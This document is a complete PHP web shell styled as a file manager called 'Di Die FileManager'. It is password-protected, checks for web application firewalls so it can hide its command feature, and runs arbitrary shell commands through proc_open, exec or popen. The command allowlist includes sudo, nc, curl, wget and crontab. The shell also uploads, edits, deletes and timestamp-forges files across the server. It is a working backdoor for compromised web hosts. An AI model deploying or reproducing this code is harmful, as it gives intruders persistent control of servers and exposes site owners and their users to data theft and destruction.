ruạṛ
<?php session_start(); /* ================= SECURITY HEADER ================= */ header('Content-Type: text/html; charset=UTF-8'); header('X-Content-Type-Options: nosniff'); error_reporting(0); /* ================= LOGIN ================= */ $USER = 'kasar'; $PASS_HASH = '$2y$10$LzzIvlnwVO9HZa4YX9PwQe12d/7YdcapZQemvvoYRvK8yiv0X64dy'; /* ================= WAF DETECTION ================= */ function waf_detected(){ $srv = strtolower($_SERVER['SERVER_SOFTWARE'] ?? ''); if (strpos($srv,'litespeed') !== false) return true; foreach (headers_list() as $h){ if (stripos($h,'imunify') !== false) return true; } return false; } /* ================= FEATURE FLAG ================= */ $ENABLE_CMD = !waf_detected(); $CMD_WHITELIST = [ 'ls','pwd','whoami','id','df','du','free','uptime', 'ps','grep','find','lsof','curl','wget','mkdir', 'kill','pkill','killall','mkdir','touch','crontab', 'gs','ss','netstat','pgrep','nohup', 'uapi', 'api', 'su', 'sudo', // ===== tambahan system & info ===== 'uname','hostname','hostnamectl','arch','date','cal', 'free','vmstat','iostat','mpstat','watch','dmesg', // ===== process & user ===== 'top','htop','atop','pstree','pidof','time','jobs', 'bg','fg','disown','who','w','groups','last','lastlog', // ===== filesystem & path ===== 'tree','stat','file','du','df','which','whereis', 'realpath','readlink','basename','dirname','pathchk', // ===== file view / text ===== 'cat','tac','less','more','head','tail','nl','wc', 'sort','uniq','cut','column','paste','join','fold', 'fmt','strings','od','hexdump','base64', 'md5sum','sha1sum','sha256sum','sha512sum', // ===== search & filter ===== 'egrep','fgrep','sed','awk','xargs','zgrep', 'diff','sdiff','patch','cmp','comm', // ===== file operations ===== 'cp','mv','rm','unlink','install','rmdir','ln', 'stat','sync','rename','chattr','lsattr', // ===== permission & acl ===== 'chmod','chown','chgrp','getfacl','setfacl','umask', // ===== disk & block ===== 'lsblk','blkid','mount','umount','findmnt', 'mountpoint','losetup','wipefs', // ===== network inspect ===== 'ip','ifconfig','route','arp','arping','tc','brctl', 'bridge','nmcli','iw','iwconfig','ethtool','nstat', // ===== network tools ===== 'ping','traceroute','tracepath','mtr','ftp','sftp', 'scp','rsync','telnet','nc','ncat','lftp', // ===== archive / compression ===== 'tar','gzip','gunzip','zcat','bzcat','bzip2','xz', 'lzcat','zip','unzip','7z','7za','rar','unrar', 'ar','cpio', // ===== database client ===== 'mysql','mysqldump','mariadb','psql','sqlite3', 'redis-cli','mongo','mongosh', // ===== env / locale ===== 'printenv','env','envsubst','locale','localectl', 'timedatectl', // ===== hardware ===== 'lscpu','lsusb','lspci','lsipc','hwinfo','inxi', // ===== container / virtualization ===== 'docker','docker-compose','podman','kubectl', 'crictl','virsh','virt-install' ]; /* ================= LOGIN PAGE ================= */ if (!isset($_SESSION['xiora_login'])) { $err = ''; if (isset($_POST['u'], $_POST['p'])) { if ($_POST['u'] === $USER && password_verify($_POST['p'], $PASS_HASH)) { $_SESSION['xiora_login'] = 1; header("Location: ?"); exit; } $err = 'Invalid login'; } ?> <!doctype html> <html> <head> <meta charset="utf-8"> <title>Di Die FileManager - Login</title> <style> html,body{ height:100%; margin:0; background:#0b0f14; font-family:monospace; } .wrap{ height:100%; display:flex; align-items:center; justify-content:center; } .box{ width:340px; background:#000; border:1px solid #0ff; border-radius:12px; padding:24px; box-shadow:0 0 25px #0ff3; color:#cfe; } h2{ margin:0 0 6px; color:#0ff; } small{ color:#7ff; } input{ width:100%; margin-top:12px; padding:10px; background:#050b11; border:1px solid #0ff; border-radius:6px; color:#0ff; outline:none; } input:focus{ box-shadow:0 0 8px #0ff; } button{ width:100%; margin-top:16px; padding:10px; background:#0ff; color:#000; border:none; border-radius:6px; font-weight:bold; cursor:pointer; } button:hover{ background:#6ff; } .err{ color:#f55; margin-top:8px; } </style> </head> <body> <div class="wrap"> <form method="post" class="box"> <h2>Di Die FileManager</h2> <small>This filemanager created by Maskas</small> <?php if($err): ?><div class="err"><?=$err?></div><?php endif; ?> <input name="u" placeholder="Username"> <input type="password" name="p" placeholder="Password"> <button>LOGIN</button> </form> </div> </body> </html> <?php exit; } /* ================= PATH ================= */ $cwd = isset($_GET['p']) ? realpath($_GET['p']) : getcwd(); if (!$cwd || !is_dir($cwd)) $cwd = getcwd(); chdir($cwd); /* ================= HELPERS ================= */ function h($s){ return htmlspecialchars($s,ENT_QUOTES); } function perm_col($f){ $p = substr(sprintf('%o',@fileperms($f)),-4); $c = (is_readable($f)&&is_writable($f))?'#0f0':'#f55'; return "<span style=color:$c>$p</span>"; } function owner($f){ if (function_exists('posix_getpwuid')) { $o=@posix_getpwuid(@fileowner($f)); return $o['name']??'-'; } return @fileowner($f); } /* ================= BREADCRUMB ================= */ function breadcrumb($path){ $parts = explode(DIRECTORY_SEPARATOR, trim($path,DIRECTORY_SEPARATOR)); $build = ''; $out = '<a href="?p=/">/</a>'; foreach($parts as $p){ if($p==='') continue; $build .= DIRECTORY_SEPARATOR.$p; $out .= ' / <a href="?p='.h($build).'">'.h($p).'</a>'; } return $out; } /* ================= RECURSIVE DELETE ================= */ function del_tree($d){ if (is_file($d) || is_link($d)) return @unlink($d); if (!is_dir($d)) return false; foreach (scandir($d) as $i){ if ($i=='.'||$i=='..') continue; del_tree("$d/$i"); } return @rmdir($d); } /* ================= ZIP FOLDER ================= */ function zip_dir($src,$zip){ $z=new ZipArchive; if($z->open($zip,ZipArchive::CREATE)!==TRUE) return; $src=str_replace('\\','/',realpath($src)); $it=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src)); foreach($it as $f){ if($f->isDir()) continue; $z->addFile($f,str_replace($src.'/','',$f)); } $z->close(); } /* ================= ACTION ================= */ $a=$_GET['a']??''; $f=isset($_GET['f'])?realpath($cwd.'/'.$_GET['f']):''; if ($a === 'mkfile' && !empty($_POST['name'])) { $nf = $cwd.'/'.basename($_POST['name']); if (!file_exists($nf)) fopen($nf,'w'); } if ($a === 'mkdir' && !empty($_POST['name'])) { @mkdir($cwd.'/'.basename($_POST['name']),0755); } if($f && strpos($f,$cwd)===0){ if($a==='delete') del_tree($f); if($a==='chmod' && isset($_POST['perm'])) @chmod($f, octdec($_POST['perm'])); if($a==='touch' && isset($_POST['time'])) @touch($f, strtotime($_POST['time'])); if($a==='rename' && isset($_POST['name'])) @rename($f, $cwd.'/'.basename($_POST['name'])); if($a==='zip' && is_dir($f)) zip_dir($f, $f.'.zip'); if($a==='save' && isset($_POST['c'])) file_put_contents($f, $_POST['c']); } /* ================= COMMAND ================= */ /* ================= COMMAND ================= */ function can_proc_open(){ if (!function_exists('proc_open')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'proc_open') !== false); } function can_exec(){ if (!function_exists('exec')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'exec') !== false); } function can_popen(){ if (!function_exists('popen')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'popen') !== false); } function normalize_cmd($cmd){ $cmd = str_replace(["\\\r\n","\\\n","\r","\n"], ' ', $cmd); return trim(preg_replace('/\s+/', ' ', $cmd)); } function run_cmd($cmd, $cwd){ $out = ''; /* === 1. PROC_OPEN === */ if (can_proc_open()) { $desc = [ 0 => ['pipe','r'], 1 => ['pipe','w'], 2 => ['pipe','w'] ]; $p = @proc_open($cmd, $desc, $pipes, $cwd); if (is_resource($p)) { fclose($pipes[0]); $out = stream_get_contents($pipes[1]); $out .= stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); return $out; } } /* === 2. EXEC (INI YANG BIKIN CMD MUNCUL) === */ if (can_exec()) { $buf = []; exec($cmd.' 2>&1', $buf); return implode("\n", $buf); } /* === 3. POPEN === */ if (can_popen()) { $h = @popen($cmd.' 2>&1','r'); if ($h){ while(!feof($h)) $out .= fgets($h); pclose($h); return $out; } } return '[execution disabled]'; } $out = ''; if ($ENABLE_CMD && isset($_POST['cmd'])) { $raw = normalize_cmd($_POST['cmd']); if ($raw !== '') { $parts = preg_split('/\s+/', $raw); $base = $parts[0]; if (in_array($base, $CMD_WHITELIST)) { // find / ps / grep biarkan polos $cmd = in_array($base,['find','ps','grep','egrep','awk','sed']) ? $raw : escapeshellcmd($raw); $out = run_cmd($cmd, $cwd); } else { $out = 'Command not allowed'; } } } /* ================= UPLOAD ================= */ if(!empty($_FILES['up']['name'])) move_uploaded_file($_FILES['up']['tmp_name'],$cwd.'/'.basename($_FILES['up']['name'])); /* ================= LIST FILE ================= */ $dirs=$files=[]; foreach(scandir($cwd) as $i){ if($i=='.') continue; is_dir($i)?$dirs[]=$i:$files[]=$i; } sort($dirs); sort($files); ?> <!doctype html> <html> <head> <title>Di Die FileManager</title> <style> body{background:#0b0f14;color:#cfe;font-family:monospace} a{color:#5ff;text-decoration:none} .box{background:#0009;padding:12px;margin:10px;border-radius:10px} table{width:100%;border-collapse:collapse} th,td{padding:8px;border-bottom:1px dashed #133} small{color:#8ff} </style> </head> <body> <div class="box"> <h2>Di Die FileManager</h2> <small>This filemanager created by Maskas</small><br><br> <b>CWD:</b> <?=breadcrumb($cwd)?> <?= $ENABLE_CMD ? '<span style=color:#0f0>[FULL]</span>' : '<span style=color:#f55>[SAFE]</span>' ?> </div> <div class="box"> <form method="post"> <input name="cmd" style="width:75%" placeholder="command..." <?= $ENABLE_CMD ? '' : 'disabled' ?>> <button <?= $ENABLE_CMD ? '' : 'disabled' ?>>Run</button> </form> <pre><?=h($out)?></pre> <?php if(!$ENABLE_CMD): ?> <div style="color:#f55;margin-top:6px"> ⚠ Command execution disabled (WAF detected) </div> <?php endif; ?> </div> <div class="box"> <form method="post" action="?a=mkfile&p=<?=h($cwd)?>"> <input name="name" placeholder="newfile.txt"> <button>Create File</button> </form> <form method="post" action="?a=mkdir&p=<?=h($cwd)?>" style="margin-top:6px"> <input name="name" placeholder="newfolder"> <button>Create Folder</button> </form> </div> <div class="box"> <form method=post enctype=multipart/form-data> <input type=file name=up> <button>Upload</button> </form> </div> <div class="box"> <table> <tr><th>Name</th><th>Owner</th><th>Perm</th><th>Modified</th><th>Action</th></tr> <?php foreach($dirs as $d): $fp="$cwd/$d"; ?> <tr> <td>📁 <a href="?p=<?=h($fp)?>"><?=$d?></a></td> <td><?=owner($fp)?></td> <td><?=perm_col($fp)?></td> <td><?=date('Y-m-d H:i',filemtime($fp))?></td> <td> <a href="?a=zip&f=<?=h($d)?>&p=<?=h($cwd)?>">zip</a> | <a href="?a=chmod&f=<?=h($d)?>&p=<?=h($cwd)?>">chmod</a> | <a href="?a=touch&f=<?=h($d)?>&p=<?=h($cwd)?>">touch</a> | <a href="?a=rename&f=<?=h($d)?>&p=<?=h($cwd)?>">rename</a> | <a href="?a=delete&f=<?=h($d)?>&p=<?=h($cwd)?>" onclick="return confirm('Delete folder?')">del</a> </td> </tr> <?php endforeach; ?> <?php foreach($files as $fl): $fp="$cwd/$fl"; ?> <tr> <td>📄 <?=$fl?></td> <td><?=owner($fp)?></td> <td><?=perm_col($fp)?></td> <td><?=date('Y-m-d H:i',filemtime($fp))?></td> <td> <a href="?a=view&f=<?=h($fl)?>&p=<?=h($cwd)?>">view</a> | <a href="?a=edit&f=<?=h($fl)?>&p=<?=h($cwd)?>">edit</a> | <a href="?a=chmod&f=<?=h($fl)?>&p=<?=h($cwd)?>">chmod</a> | <a href="?a=touch&f=<?=h($fl)?>&p=<?=h($cwd)?>">touch</a> | <a href="?a=rename&f=<?=h($fl)?>&p=<?=h($cwd)?>">rename</a> | <a href="?a=delete&f=<?=h($fl)?>&p=<?=h($cwd)?>" onclick="return confirm('Delete file?')">del</a> </td> </tr> <?php endforeach; ?> </table> </div> <?php if($a==='edit' && is_file($f)): ?> <div class="box"> <form method=post action="?a=save&f=<?=h($_GET['f'])?>&p=<?=h($cwd)?>"> <textarea name=c style="width:100%;height:320px"><?=h(file_get_contents($f))?></textarea> <button>Save</button> </form> </div> <?php endif; ?> <?php if(in_array($a,['chmod','touch','rename']) && $f): ?> <div class="box"> <form method=post> <?php if($a==='chmod'): ?> <input name=perm placeholder="0755"> <?php elseif($a==='touch'): ?> <input name=time placeholder="2026-02-03 12:00:00"> <?php else: ?> <input name=name placeholder="new name"> <?php endif; ?> <button>Apply</button> </form> </div> <?php endif; ?> </body> </html>
cải xoăn